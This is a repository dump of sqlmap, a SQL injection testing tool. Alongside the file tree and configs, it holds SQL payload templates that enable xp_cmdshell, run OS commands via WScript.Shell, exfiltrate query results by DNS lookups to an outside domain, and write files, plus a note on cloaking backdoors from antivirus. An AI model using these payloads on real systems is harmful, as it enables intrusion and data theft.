├── .gitattributes
├── .github
├── CODE_OF_CONDUCT.md
├── CONTRIBUTING.md
├── FUNDING.yml
├── ISSUE_TEMPLATE
│ ├── bug_report.md
│ └── feature_request.md
└── workflows
│ └── tests.yml
├── .gitignore
├── LICENSE
├── README.md
├── data
├── html
│ └── index.html
├── procs
│ ├── README.txt
│ ├── mssqlserver
│ │ ├── activate_sp_oacreate.sql
│ │ ├── configure_openrowset.sql
│ │ ├── configure_xp_cmdshell.sql
│ │ ├── create_new_xp_cmdshell.sql
│ │ ├── disable_xp_cmdshell_2000.sql
│ │ ├── dns_request.sql
│ │ ├── enable_xp_cmdshell_2000.sql
│ │ └── run_statement_as_user.sql
│ ├── mysql
│ │ ├── dns_request.sql
│ │ └── write_file_limit.sql
│ ├── oracle
│ │ ├── dns_request.sql
│ │ └── read_file_export_extension.sql
│ └── postgresql
│ │ └── dns_request.sql
├── shell
│ ├── README.txt
│ ├── backdoors
│ │ ├── backdoor.asp_
│ │ ├── backdoor.aspx_
│ │ ├── backdoor.jsp_
│ │ └── backdoor.php_
│ └── stagers
│ │ ├── stager.asp_
│ │ ├── stager.aspx_
│ │ ├── stager.jsp_
│ │ └── stager.php_
├── txt
│ ├── common-columns.txt
│ ├── common-files.txt
│ ├── common-outputs.txt
│ ├── common-tables.txt
│ ├── keywords.txt
│ ├── sha256sums.txt
│ ├── smalldict.txt
│ ├── user-agents.txt
│ └── wordlist.tx_
├── udf
│ ├── README.txt
│ ├── mysql
│ │ ├── linux
│ │ │ ├── 32
│ │ │ │ └── lib_mysqludf_sys.so_
│ │ │ └── 64
│ │ │ │ └── lib_mysqludf_sys.so_
│ │ └── windows
│ │ │ ├── 32
│ │ │ └── lib_mysqludf_sys.dll_
│ │ │ └── 64
│ │ │ └── lib_mysqludf_sys.dll_
│ └── postgresql
│ │ ├── linux
│ │ ├── 32
│ │ │ ├── 10
│ │ │ │ └── lib_postgresqludf_sys.so_
│ │ │ ├── 11
│ │ │ │ └── lib_postgresqludf_sys.so_
│ │ │ ├── 8.2
│ │ │ │ └── lib_postgresqludf_sys.so_
│ │ │ ├── 8.3
│ │ │ │ └── lib_postgresqludf_sys.so_
│ │ │ ├── 8.4
│ │ │ │ └── lib_postgresqludf_sys.so_
│ │ │ ├── 9.0
│ │ │ │ └── lib_postgresqludf_sys.so_
│ │ │ ├── 9.1
│ │ │ │ └── lib_postgresqludf_sys.so_
│ │ │ ├── 9.2
│ │ │ │ └── lib_postgresqludf_sys.so_
│ │ │ ├── 9.3
│ │ │ │ └── lib_postgresqludf_sys.so_
│ │ │ ├── 9.4
│ │ │ │ └── lib_postgresqludf_sys.so_
│ │ │ ├── 9.5
│ │ │ │ └── lib_postgresqludf_sys.so_
│ │ │ └── 9.6
│ │ │ │ └── lib_postgresqludf_sys.so_
│ │ └── 64
│ │ │ ├── 10
│ │ │ └── lib_postgresqludf_sys.so_
│ │ │ ├── 11
│ │ │ └── lib_postgresqludf_sys.so_
│ │ │ ├── 12
│ │ │ └── lib_postgresqludf_sys.so_
│ │ │ ├── 8.2
│ │ │ └── lib_postgresqludf_sys.so_
│ │ │ ├── 8.3
│ │ │ └── lib_postgresqludf_sys.so_
│ │ │ ├── 8.4
│ │ │ └── lib_postgresqludf_sys.so_
│ │ │ ├── 9.0
│ │ │ └── lib_postgresqludf_sys.so_
│ │ │ ├── 9.1
│ │ │ └── lib_postgresqludf_sys.so_
│ │ │ ├── 9.2
│ │ │ └── lib_postgresqludf_sys.so_
│ │ │ ├── 9.3
│ │ │ └── lib_postgresqludf_sys.so_
│ │ │ ├── 9.4
│ │ │ └── lib_postgresqludf_sys.so_
│ │ │ ├── 9.5
│ │ │ └── lib_postgresqludf_sys.so_
│ │ │ └── 9.6
│ │ │ └── lib_postgresqludf_sys.so_
│ │ └── windows
│ │ └── 32
│ │ ├── 8.2
│ │ └── lib_postgresqludf_sys.dll_
│ │ ├── 8.3
│ │ └── lib_postgresqludf_sys.dll_
│ │ ├── 8.4
│ │ └── lib_postgresqludf_sys.dll_
│ │ └── 9.0
│ │ └── lib_postgresqludf_sys.dll_
└── xml
│ ├── banner
│ ├── generic.xml
│ ├── mssql.xml
│ ├── mysql.xml
│ ├── oracle.xml
│ ├── postgresql.xml
│ ├── server.xml
│ ├── servlet-engine.xml
│ ├── set-cookie.xml
│ ├── sharepoint.xml
│ ├── x-aspnet-version.xml
│ └── x-powered-by.xml
│ ├── boundaries.xml
│ ├── errors.xml
│ ├── payloads
│ ├── boolean_blind.xml
│ ├── error_based.xml
│ ├── inline_query.xml
│ ├── stacked_queries.xml
│ ├── time_blind.xml
│ └── union_query.xml
│ └── queries.xml
├── doc
├── AUTHORS
├── CHANGELOG.md
├── THANKS.md
├── THIRD-PARTY.md
└── translations
│ ├── README-bg-BG.md
│ ├── README-ckb-KU.md
│ ├── README-de-DE.md
│ ├── README-es-MX.md
│ ├── README-fa-IR.md
│ ├── README-fr-FR.md
│ ├── README-gr-GR.md
│ ├── README-hr-HR.md
│ ├── README-id-ID.md
│ ├── README-in-HI.md
│ ├── README-it-IT.md
│ ├── README-ja-JP.md
│ ├── README-ka-GE.md
│ ├── README-ko-KR.md
│ ├── README-nl-NL.md
│ ├── README-pl-PL.md
│ ├── README-pt-BR.md
│ ├── README-rs-RS.md
│ ├── README-ru-RU.md
│ ├── README-sk-SK.md
│ ├── README-tr-TR.md
│ ├── README-uk-UA.md
│ ├── README-vi-VN.md
│ └── README-zh-CN.md
├── extra
├── __init__.py
├── beep
│ ├── __init__.py
│ ├── beep.py
│ └── beep.wav
├── cloak
│ ├── README.txt
│ ├── __init__.py
│ └── cloak.py
├── dbgtool
│ ├── README.txt
│ ├── __init__.py
│ └── dbgtool.py
├── icmpsh
│ ├── README.txt
│ ├── __init__.py
│ ├── icmpsh-m.c
│ ├── icmpsh-m.pl
│ ├── icmpsh-s.c
│ ├── icmpsh.exe_
│ └── icmpsh_m.py
├── runcmd
│ ├── README.txt
│ ├── runcmd.exe_
│ └── src
│ │ ├── README.txt
│ │ ├── runcmd.sln
│ │ └── runcmd
│ │ ├── runcmd.cpp
│ │ ├── runcmd.vcproj
│ │ ├── stdafx.cpp
│ │ └── stdafx.h
├── shellcodeexec
│ ├── README.txt
│ ├── linux
│ │ ├── shellcodeexec.x32_
│ │ └── shellcodeexec.x64_
│ └── windows
│ │ └── shellcodeexec.x32.exe_
├── shutils
│ ├── autocompletion.sh
│ ├── blanks.sh
│ ├── drei.sh
│ ├── duplicates.py
│ ├── junk.sh
│ ├── newlines.py
│ ├── postcommit-hook.sh
│ ├── precommit-hook.sh
│ ├── pycodestyle.sh
│ ├── pydiatra.sh
│ ├── pyflakes.sh
│ ├── pypi.sh
│ ├── recloak.sh
│ └── strip.sh
└── vulnserver
│ ├── __init__.py
│ └── vulnserver.py
├── lib
├── __init__.py
├── controller
│ ├── __init__.py
│ ├── action.py
│ ├── checks.py
│ ├── controller.py
│ └── handler.py
├── core
│ ├── __init__.py
│ ├── agent.py
│ ├── bigarray.py
│ ├── common.py
│ ├── compat.py
│ ├── convert.py
│ ├── data.py
│ ├── datatype.py
│ ├── decorators.py
│ ├── defaults.py
│ ├── dicts.py
│ ├── dump.py
│ ├── enums.py
│ ├── exception.py
│ ├── gui.py
│ ├── log.py
│ ├── option.py
│ ├── optiondict.py
│ ├── patch.py
│ ├── profiling.py
│ ├── readlineng.py
│ ├── replication.py
│ ├── revision.py
│ ├── session.py
│ ├── settings.py
│ ├── shell.py
│ ├── subprocessng.py
│ ├── target.py
│ ├── testing.py
│ ├── threads.py
│ ├── unescaper.py
│ ├── update.py
│ └── wordlist.py
├── parse
│ ├── __init__.py
│ ├── banner.py
│ ├── cmdline.py
│ ├── configfile.py
│ ├── handler.py
│ ├── headers.py
│ ├── html.py
│ ├── payloads.py
│ └── sitemap.py
├── request
│ ├── __init__.py
│ ├── basic.py
│ ├── basicauthhandler.py
│ ├── chunkedhandler.py
│ ├── comparison.py
│ ├── connect.py
│ ├── direct.py
│ ├── dns.py
│ ├── httpshandler.py
│ ├── inject.py
│ ├── methodrequest.py
│ ├── pkihandler.py
│ ├── rangehandler.py
│ ├── redirecthandler.py
│ └── templates.py
├── takeover
│ ├── __init__.py
│ ├── abstraction.py
│ ├── icmpsh.py
│ ├── metasploit.py
│ ├── registry.py
│ ├── udf.py
│ ├── web.py
│ └── xp_cmdshell.py
├── techniques
│ ├── __init__.py
│ ├── blind
│ │ ├── __init__.py
│ │ └── inference.py
│ ├── dns
│ │ ├── __init__.py
│ │ ├── test.py
│ │ └── use.py
│ ├── error
│ │ ├── __init__.py
│ │ └── use.py
│ └── union
│ │ ├── __init__.py
│ │ ├── test.py
│ │ └── use.py
└── utils
│ ├── __init__.py
│ ├── api.py
│ ├── brute.py
│ ├── crawler.py
│ ├── deps.py
│ ├── getch.py
│ ├── har.py
│ ├── hash.py
│ ├── hashdb.py
│ ├── httpd.py
│ ├── pivotdumptable.py
│ ├── progress.py
│ ├── purge.py
│ ├── safe2bin.py
│ ├── search.py
│ ├── sgmllib.py
│ ├── sqlalchemy.py
│ ├── timeout.py
│ ├── versioncheck.py
│ └── xrange.py
├── plugins
├── __init__.py
├── dbms
│ ├── __init__.py
│ ├── access
│ │ ├── __init__.py
│ │ ├── connector.py
│ │ ├── enumeration.py
│ │ ├── filesystem.py
│ │ ├── fingerprint.py
│ │ ├── syntax.py
│ │ └── takeover.py
│ ├── altibase
│ │ ├── __init__.py
│ │ ├── connector.py
│ │ ├── enumeration.py
│ │ ├── filesystem.py
│ │ ├── fingerprint.py
│ │ ├── syntax.py
│ │ └── takeover.py
│ ├── cache
│ │ ├── __init__.py
│ │ ├── connector.py
│ │ ├── enumeration.py
│ │ ├── filesystem.py
│ │ ├── fingerprint.py
│ │ ├── syntax.py
│ │ └── takeover.py
│ ├── clickhouse
│ │ ├── __init__.py
│ │ ├── connector.py
│ │ ├── enumeration.py
│ │ ├── filesystem.py
│ │ ├── fingerprint.py
│ │ ├── syntax.py
│ │ └── takeover.py
│ ├── cratedb
│ │ ├── __init__.py
│ │ ├── connector.py
│ │ ├── enumeration.py
│ │ ├── filesystem.py
│ │ ├── fingerprint.py
│ │ ├── syntax.py
│ │ └── takeover.py
│ ├── cubrid
│ │ ├── __init__.py
│ │ ├── connector.py
│ │ ├── enumeration.py
│ │ ├── filesystem.py
│ │ ├── fingerprint.py
│ │ ├── syntax.py
│ │ └── takeover.py
│ ├── db2
│ │ ├── __init__.py
│ │ ├── connector.py
│ │ ├── enumeration.py
│ │ ├── filesystem.py
│ │ ├── fingerprint.py
│ │ ├── syntax.py
│ │ └── takeover.py
│ ├── derby
│ │ ├── __init__.py
│ │ ├── connector.py
│ │ ├── enumeration.py
│ │ ├── filesystem.py
│ │ ├── fingerprint.py
│ │ ├── syntax.py
│ │ └── takeover.py
│ ├── extremedb
│ │ ├── __init__.py
│ │ ├── connector.py
│ │ ├── enumeration.py
│ │ ├── filesystem.py
│ │ ├── fingerprint.py
│ │ ├── syntax.py
│ │ └── takeover.py
│ ├── firebird
│ │ ├── __init__.py
│ │ ├── connector.py
│ │ ├── enumeration.py
│ │ ├── filesystem.py
│ │ ├── fingerprint.py
│ │ ├── syntax.py
│ │ └── takeover.py
│ ├── frontbase
│ │ ├── __init__.py
│ │ ├── connector.py
│ │ ├── enumeration.py
│ │ ├── filesystem.py
│ │ ├── fingerprint.py
│ │ ├── syntax.py
│ │ └── takeover.py
│ ├── h2
│ │ ├── __init__.py
│ │ ├── connector.py
│ │ ├── enumeration.py
│ │ ├── filesystem.py
│ │ ├── fingerprint.py
│ │ ├── syntax.py
│ │ └── takeover.py
│ ├── hsqldb
│ │ ├── __init__.py
│ │ ├── connector.py
│ │ ├── enumeration.py
│ │ ├── filesystem.py
│ │ ├── fingerprint.py
│ │ ├── syntax.py
│ │ └── takeover.py
│ ├── informix
│ │ ├── __init__.py
│ │ ├── connector.py
│ │ ├── enumeration.py
│ │ ├── filesystem.py
│ │ ├── fingerprint.py
│ │ ├── syntax.py
│ │ └── takeover.py
│ ├── maxdb
│ │ ├── __init__.py
│ │ ├── connector.py
│ │ ├── enumeration.py
│ │ ├── filesystem.py
│ │ ├── fingerprint.py
│ │ ├── syntax.py
│ │ └── takeover.py
│ ├── mckoi
│ │ ├── __init__.py
│ │ ├── connector.py
│ │ ├── enumeration.py
│ │ ├── filesystem.py
│ │ ├── fingerprint.py
│ │ ├── syntax.py
│ │ └── takeover.py
│ ├── mimersql
│ │ ├── __init__.py
│ │ ├── connector.py
│ │ ├── enumeration.py
│ │ ├── filesystem.py
│ │ ├── fingerprint.py
│ │ ├── syntax.py
│ │ └── takeover.py
│ ├── monetdb
│ │ ├── __init__.py
│ │ ├── connector.py
│ │ ├── enumeration.py
│ │ ├── filesystem.py
│ │ ├── fingerprint.py
│ │ ├── syntax.py
│ │ └── takeover.py
│ ├── mssqlserver
│ │ ├── __init__.py
│ │ ├── connector.py
│ │ ├── enumeration.py
│ │ ├── filesystem.py
│ │ ├── fingerprint.py
│ │ ├── syntax.py
│ │ └── takeover.py
│ ├── mysql
│ │ ├── __init__.py
│ │ ├── connector.py
│ │ ├── enumeration.py
│ │ ├── filesystem.py
│ │ ├── fingerprint.py
│ │ ├── syntax.py
│ │ └── takeover.py
│ ├── oracle
│ │ ├── __init__.py
│ │ ├── connector.py
│ │ ├── enumeration.py
│ │ ├── filesystem.py
│ │ ├── fingerprint.py
│ │ ├── syntax.py
│ │ └── takeover.py
│ ├── postgresql
│ │ ├── __init__.py
│ │ ├── connector.py
│ │ ├── enumeration.py
│ │ ├── filesystem.py
│ │ ├── fingerprint.py
│ │ ├── syntax.py
│ │ └── takeover.py
│ ├── presto
│ │ ├── __init__.py
│ │ ├── connector.py
│ │ ├── enumeration.py
│ │ ├── filesystem.py
│ │ ├── fingerprint.py
│ │ ├── syntax.py
│ │ └── takeover.py
│ ├── raima
│ │ ├── __init__.py
│ │ ├── connector.py
│ │ ├── enumeration.py
│ │ ├── filesystem.py
│ │ ├── fingerprint.py
│ │ ├── syntax.py
│ │ └── takeover.py
│ ├── sqlite
│ │ ├── __init__.py
│ │ ├── connector.py
│ │ ├── enumeration.py
│ │ ├── filesystem.py
│ │ ├── fingerprint.py
│ │ ├── syntax.py
│ │ └── takeover.py
│ ├── sybase
│ │ ├── __init__.py
│ │ ├── connector.py
│ │ ├── enumeration.py
│ │ ├── filesystem.py
│ │ ├── fingerprint.py
│ │ ├── syntax.py
│ │ └── takeover.py
│ ├── vertica
│ │ ├── __init__.py
│ │ ├── connector.py
│ │ ├── enumeration.py
│ │ ├── filesystem.py
│ │ ├── fingerprint.py
│ │ ├── syntax.py
│ │ └── takeover.py
│ └── virtuoso
│ │ ├── __init__.py
│ │ ├── connector.py
│ │ ├── enumeration.py
│ │ ├── filesystem.py
│ │ ├── fingerprint.py
│ │ ├── syntax.py
│ │ └── takeover.py
└── generic
│ ├── __init__.py
│ ├── connector.py
│ ├── custom.py
│ ├── databases.py
│ ├── entries.py
│ ├── enumeration.py
│ ├── filesystem.py
│ ├── fingerprint.py
│ ├── misc.py
│ ├── search.py
│ ├── syntax.py
│ ├── takeover.py
│ └── users.py
├── sqlmap.conf
├── sqlmap.py
├── sqlmapapi.py
├── sqlmapapi.yaml
├── tamper
├── 0eunion.py
├── __init__.py
├── apostrophemask.py
├── apostrophenullencode.py
├── appendnullbyte.py
├── base64encode.py
├── between.py
├── binary.py
├── bluecoat.py
├── chardoubleencode.py
├── charencode.py
├── charunicodeencode.py
├── charunicodeescape.py
├── commalesslimit.py
├── commalessmid.py
├── commentbeforeparentheses.py
├── concat2concatws.py
├── decentities.py
├── dunion.py
├── equaltolike.py
├── equaltorlike.py
├── escapequotes.py
├── greatest.py
├── halfversionedmorekeywords.py
├── hex2char.py
├── hexentities.py
├── htmlencode.py
├── if2case.py
├── ifnull2casewhenisnull.py
├── ifnull2ifisnull.py
├── informationschemacomment.py
├── least.py
├── lowercase.py
├── luanginx.py
├── luanginxmore.py
├── misunion.py
├── modsecurityversioned.py
├── modsecurityzeroversioned.py
├── multiplespaces.py
├── ord2ascii.py
├── overlongutf8.py
├── overlongutf8more.py
├── percentage.py
├── plus2concat.py
├── plus2fnconcat.py
├── randomcase.py
├── randomcomments.py
├── schemasplit.py
├── scientific.py
├── sleep2getlock.py
├── sp_password.py
├── space2comment.py
├── space2dash.py
├── space2hash.py
├── space2morecomment.py
├── space2morehash.py
├── space2mssqlblank.py
├── space2mssqlhash.py
├── space2mysqlblank.py
├── space2mysqldash.py
├── space2plus.py
├── space2randomblank.py
├── substring2leftright.py
├── symboliclogical.py
├── unionalltounion.py
├── unmagicquotes.py
├── uppercase.py
├── varnish.py
├── versionedkeywords.py
├── versionedmorekeywords.py
└── xforwardedfor.py
└── thirdparty
├── __init__.py
├── ansistrm
├── __init__.py
└── ansistrm.py
├── beautifulsoup
├── __init__.py
└── beautifulsoup.py
├── bottle
├── __init__.py
└── bottle.py
├── chardet
├── __init__.py
├── big5freq.py
├── big5prober.py
├── chardistribution.py
├── charsetgroupprober.py
├── charsetprober.py
├── codingstatemachine.py
├── compat.py
├── cp949prober.py
├── enums.py
├── escprober.py
├── escsm.py
├── eucjpprober.py
├── euckrfreq.py
├── euckrprober.py
├── euctwfreq.py
├── euctwprober.py
├── gb2312freq.py
├── gb2312prober.py
├── hebrewprober.py
├── jisfreq.py
├── jpcntx.py
├── langbulgarianmodel.py
├── langcyrillicmodel.py
├── langgreekmodel.py
├── langhebrewmodel.py
├── langhungarianmodel.py
├── langthaimodel.py
├── langturkishmodel.py
├── latin1prober.py
├── mbcharsetprober.py
├── mbcsgroupprober.py
├── mbcssm.py
├── sbcharsetprober.py
├── sbcsgroupprober.py
├── sjisprober.py
├── universaldetector.py
├── utf8prober.py
└── version.py
├── clientform
├── __init__.py
└── clientform.py
├── colorama
├── __init__.py
├── ansi.py
├── ansitowin32.py
├── initialise.py
├── win32.py
└── winterm.py
├── fcrypt
├── __init__.py
└── fcrypt.py
├── identywaf
├── LICENSE
├── __init__.py
├── data.json
└── identYwaf.py
├── keepalive
├── __init__.py
└── keepalive.py
├── magic
├── __init__.py
└── magic.py
├── multipart
├── __init__.py
└── multipartpost.py
├── odict
├── __init__.py
└── ordereddict.py
├── prettyprint
├── __init__.py
└── prettyprint.py
├── pydes
├── __init__.py
└── pyDes.py
├── six
└── __init__.py
├── socks
├── LICENSE
├── __init__.py
└── socks.py
├── termcolor
├── __init__.py
└── termcolor.py
└── wininetpton
├── __init__.py
└── win_inet_pton.py
/.gitattributes:
--------------------------------------------------------------------------------
1 | *.conf text eol=lf
2 | *.json text eol=lf
3 | *.html text eol=lf
4 | *.md text eol=lf
5 | *.md5 text eol=lf
6 | *.pl text eol=lf
7 | *.py text eol=lf
8 | *.sh text eol=lf
9 | *.sql text eol=lf
10 | *.txt text eol=lf
11 | *.xml text eol=lf
12 | *.yaml text eol=lf
13 | *.yml text eol=lf
14 | LICENSE text eol=lf
15 | COMMITMENT text eol=lf
16 |
17 | *_ binary
18 | *.dll binary
19 | *.pdf binary
20 | *.so binary
21 | *.wav binary
22 | *.zip binary
23 | *.x32 binary
24 | *.x64 binary
25 | *.exe binary
26 | *.sln binary
27 | *.vcproj binary
28 |
--------------------------------------------------------------------------------
/.github/FUNDING.yml:
--------------------------------------------------------------------------------
1 | github: sqlmapproject
2 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/bug_report.md:
--------------------------------------------------------------------------------
1 | ---
2 | name: Bug report
3 | about: Create a report to help us improve
4 | title: ''
5 | labels: bug report
6 | assignees: ''
7 |
8 | ---
9 |
10 | **Describe the bug**
11 | A clear and concise description of what the bug is.
12 |
13 | **To Reproduce**
14 | 1. Run '...'
15 | 2. See error
16 |
17 | **Expected behavior**
18 | A clear and concise description of what you expected to happen.
19 |
20 | **Screenshots**
21 | If applicable, add screenshots to help explain your problem.
22 |
23 | **Running environment:**
24 | - sqlmap version [e.g. 1.7.2.12#dev]
25 | - Installation method [e.g. pip]
26 | - Operating system: [e.g. Microsoft Windows 11]
27 | - Python version [e.g. 3.11.2]
28 |
29 | **Target details:**
30 | - DBMS [e.g. Microsoft SQL Server]
31 | - SQLi techniques found by sqlmap [e.g. error-based and boolean-based blind]
32 | - WAF/IPS [if any]
33 | - Relevant console output [if any]
34 | - Exception traceback [if any]
35 |
36 | **Additional context**
37 | Add any other context about the problem here.
38 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/feature_request.md:
--------------------------------------------------------------------------------
1 | ---
2 | name: Feature request
3 | about: Suggest an idea for this project
4 | title: ''
5 | labels: feature request
6 | assignees: ''
7 |
8 | ---
9 |
10 | **Is your feature request related to a problem? Please describe.**
11 | A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
12 |
13 | **Describe the solution you'd like**
14 | A clear and concise description of what you want to happen.
15 |
16 | **Describe alternatives you've considered**
17 | A clear and concise description of any alternative solutions or features you've considered.
18 |
19 | **Additional context**
20 | Add any other context or screenshots about the feature request here.
21 |
--------------------------------------------------------------------------------
/.github/workflows/tests.yml:
--------------------------------------------------------------------------------
1 | on:
2 | push:
3 | branches: [ master ]
4 | pull_request:
5 | branches: [ master ]
6 |
7 | jobs:
8 | build:
9 | runs-on: ${{ matrix.os }}
10 | strategy:
11 | matrix:
12 | os: [ubuntu-latest, macos-latest, windows-latest]
13 | python-version: [ 'pypy-2.7', '3.13' ]
14 | exclude:
15 | - os: macos-latest
16 | python-version: 'pypy-2.7'
17 | steps:
18 | - uses: actions/checkout@v2
19 | - name: Set up Python
20 | uses: actions/setup-python@v2
21 | with:
22 | python-version: ${{ matrix.python-version }}
23 | - name: Basic import test
24 | run: python -c "import sqlmap; import sqlmapapi"
25 | - name: Smoke test
26 | run: python sqlmap.py --smoke
27 | - name: Vuln test
28 | run: python sqlmap.py --vuln
29 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | output/
2 | __pycache__/
3 | *.py[cod]
4 | .sqlmap_history
5 | traffic.txt
6 | *~
7 | req*.txt
8 | .idea/
--------------------------------------------------------------------------------
/data/procs/README.txt:
--------------------------------------------------------------------------------
1 | Files in this folder represent SQL snippets used by sqlmap on the target
2 | system.
3 | They are licensed under the terms of the GNU Lesser General Public License
4 | where not specified otherwise.
5 |
--------------------------------------------------------------------------------
/data/procs/mssqlserver/activate_sp_oacreate.sql:
--------------------------------------------------------------------------------
1 | EXEC master..sp_configure 'show advanced options',1;
2 | RECONFIGURE WITH OVERRIDE;
3 | EXEC master..sp_configure 'ole automation procedures',1;
4 | RECONFIGURE WITH OVERRIDE
5 |
--------------------------------------------------------------------------------
/data/procs/mssqlserver/configure_openrowset.sql:
--------------------------------------------------------------------------------
1 | EXEC master..sp_configure 'show advanced options', 1;
2 | RECONFIGURE WITH OVERRIDE;
3 | EXEC master..sp_configure 'Ad Hoc Distributed Queries', %ENABLE%;
4 | RECONFIGURE WITH OVERRIDE;
5 | EXEC sp_configure 'show advanced options', 0;
6 | RECONFIGURE WITH OVERRIDE
7 |
--------------------------------------------------------------------------------
/data/procs/mssqlserver/configure_xp_cmdshell.sql:
--------------------------------------------------------------------------------
1 | EXEC master..sp_configure 'show advanced options',1;
2 | RECONFIGURE WITH OVERRIDE;
3 | EXEC master..sp_configure 'xp_cmdshell',%ENABLE%;
4 | RECONFIGURE WITH OVERRIDE;
5 | EXEC master..sp_configure 'show advanced options',0;
6 | RECONFIGURE WITH OVERRIDE
7 |
--------------------------------------------------------------------------------
/data/procs/mssqlserver/create_new_xp_cmdshell.sql:
--------------------------------------------------------------------------------
1 | DECLARE @%RANDSTR% nvarchar(999);
2 | set @%RANDSTR%='CREATE PROCEDURE new_xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'',@ID OUT EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 EXEC sp_OADestroy @ID';
3 | EXEC master..sp_executesql @%RANDSTR%
4 |
--------------------------------------------------------------------------------
/data/procs/mssqlserver/disable_xp_cmdshell_2000.sql:
--------------------------------------------------------------------------------
1 | EXEC master..sp_dropextendedproc 'xp_cmdshell'
2 |
--------------------------------------------------------------------------------
/data/procs/mssqlserver/dns_request.sql:
--------------------------------------------------------------------------------
1 | DECLARE @host varchar(1024);
2 | SELECT @host='%PREFIX%.'+(%QUERY%)+'.%SUFFIX%.%DOMAIN%';
3 | EXEC('master..xp_dirtree "\\'+@host+'\%RANDSTR1%"')
4 | # or EXEC('master..xp_fileexist "\\'+@host+'\%RANDSTR1%"')
5 |
--------------------------------------------------------------------------------
/data/procs/mssqlserver/enable_xp_cmdshell_2000.sql:
--------------------------------------------------------------------------------
1 | EXEC master..sp_addextendedproc 'xp_cmdshell', @dllname='xplog70.dll'
2 |
--------------------------------------------------------------------------------
/data/procs/mssqlserver/run_statement_as_user.sql:
--------------------------------------------------------------------------------
1 | SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','SET FMTONLY OFF %STATEMENT%')
2 | # SELECT * FROM OPENROWSET('SQLNCLI', 'server=(local);trusted_connection=yes','SET FMTONLY OFF SELECT 1;%STATEMENT%')
3 | # SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','SET FMTONLY OFF %STATEMENT%')
4 |
--------------------------------------------------------------------------------
/data/procs/mysql/dns_request.sql:
--------------------------------------------------------------------------------
1 | SELECT LOAD_FILE(CONCAT('\\\\%PREFIX%.',(%QUERY%),'.%SUFFIX%.%DOMAIN%\\%RANDSTR1%'))
2 |
--------------------------------------------------------------------------------
/data/procs/mysql/write_file_limit.sql:
--------------------------------------------------------------------------------
1 | LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%-- -
2 |
--------------------------------------------------------------------------------
/data/procs/oracle/dns_request.sql:
--------------------------------------------------------------------------------
1 | SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
2 | # or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
3 | # or (CVE-2014-6577) SELECT EXTRACTVALUE(xmltype(' %remote;]>'),'/l') FROM dual
4 |
--------------------------------------------------------------------------------
/data/procs/postgresql/dns_request.sql:
--------------------------------------------------------------------------------
1 | DROP TABLE IF EXISTS %RANDSTR1%;
2 | # https://wiki.postgresql.org/wiki/CREATE_OR_REPLACE_LANGUAGE <- if "CREATE LANGUAGE plpgsql" is required
3 | CREATE TABLE %RANDSTR1%(%RANDSTR2% text);
4 | CREATE OR REPLACE FUNCTION %RANDSTR3%()
5 | RETURNS VOID AS $$
6 | DECLARE %RANDSTR4% TEXT;
7 | DECLARE %RANDSTR5% TEXT;
8 | BEGIN
9 | SELECT INTO %RANDSTR5% (%QUERY%);
10 | %RANDSTR4% := E'COPY %RANDSTR1%(%RANDSTR2%) FROM E\'\\\\\\\\%PREFIX%.'||%RANDSTR5%||E'.%SUFFIX%.%DOMAIN%\\\\%RANDSTR6%\'';
11 | EXECUTE %RANDSTR4%;
12 | END;
13 | $$ LANGUAGE plpgsql SECURITY DEFINER;
14 | SELECT %RANDSTR3%();
--------------------------------------------------------------------------------
/data/shell/README.txt:
--------------------------------------------------------------------------------
1 | Due to the anti-virus positive detection of shell scripts stored inside this folder, we needed to somehow circumvent this. As from the plain sqlmap users perspective nothing has to be done prior to their usage by sqlmap, but if you want to have access to their original source code use the decrypt functionality of the ../../extra/cloak/cloak.py utility.
2 |
3 | To prepare the original scripts to the cloaked form use this command:
4 | find backdoors/backdoor.* stagers/stager.* -type f -exec python ../../extra/cloak/cloak.py -i '{}' \;
5 |
6 | To get back them into the original form use this:
7 | find backdoors/backdoor.*_ stagers/stager.*_ -type f -exec python ../../extra/cloak/cloak.py -d -i '{}' \;
8 |
--------------------------------------------------------------------------------
/data/shell/backdoors/backdoor.asp_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/shell/backdoors/backdoor.asp_
--------------------------------------------------------------------------------
/data/shell/backdoors/backdoor.aspx_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/shell/backdoors/backdoor.aspx_
--------------------------------------------------------------------------------
/data/shell/backdoors/backdoor.jsp_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/shell/backdoors/backdoor.jsp_
--------------------------------------------------------------------------------
/data/shell/backdoors/backdoor.php_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/shell/backdoors/backdoor.php_
--------------------------------------------------------------------------------
/data/shell/stagers/stager.asp_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/shell/stagers/stager.asp_
--------------------------------------------------------------------------------
/data/shell/stagers/stager.aspx_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/shell/stagers/stager.aspx_
--------------------------------------------------------------------------------
/data/shell/stagers/stager.jsp_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sqlmapproject/sqlmap/f969dd8825d3971f81307bd08042162e25861d50/data/shell/stagers/stager.jsp_
--------------------------------------------------------------------------------
/data/shell/stagers/stager.php_:
--------------------------------------------------------------------------------
